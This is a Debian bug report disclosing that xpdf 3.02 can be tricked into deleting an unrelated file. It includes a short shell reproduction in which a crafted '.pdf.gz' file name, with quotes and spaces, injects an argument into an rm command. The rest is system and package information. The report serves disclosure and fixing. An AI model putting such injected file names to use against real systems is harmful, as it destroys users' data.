Package: xpdf Version: 3.02-18 Severity: critical Justification: causes serious data loss
Using a crafted .pdf.gz file name (which could be sent from a Web
server to a browser, for example), xpdf can be fooled into deleting an
unrelated file as long as its name is a single letter.
$ touch y # The unrelated victim file
$ gzip -c </dev/null >'" y ".pdf.gz' # Create a .pdf.gz file
$ xpdf '" y ".pdf.gz' # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Couldn't find trailer dictionary
Error: Couldn't read xref table
rm: cannot remove `/tmp/': Is a directory
$ ls -l y # The victim file is gone!
ls: cannot access y: No such file or directory
Thanks,
Ken
-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.39 (SMP w/4 CPU cores)
Locale: LANG=zh_TW.UTF-8, LC_CTYPE=zh_TW.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages xpdf depends on:
ii lesstif2 1:0.95.2-1 OSF/Motif 2.1 implementation relea
ii libc6 2.13-11 Embedded GNU C Library: Shared lib
ii libgcc1 1:4.6.1-5 GCC support library
ii libpoppler13 0.16.7-2 PDF rendering library
ii libstdc++6 4.6.1-5 GNU Standard C++ Library v3
ii libx11-6 2:1.4.3-3 X11 client-side library
ii libxt6 1:1.1.1-2 X11 toolkit intrinsics library
Versions of packages xpdf recommends:
ii gsfonts-x11 0.22 Make Ghostscript fonts available t
ii poppler-data 0.4.4-1 Encoding data for the poppler PDF
ii poppler-utils 0.16.7-2 PDF utilities (based on Poppler)
xpdf suggests no packages.
-- no debconf information
--
Edit this signature at http://www.digitas.harvard.edu/cgi-bin/ken/sig
I'll let a train be my feet if it's too far to walk to you
Train don't go there, I'll get a jet or a bus, I'm gonna find you
You're mine and I know that I'll find you
And my head is my only house unless it rains
signature.asc
Description: Digital signature
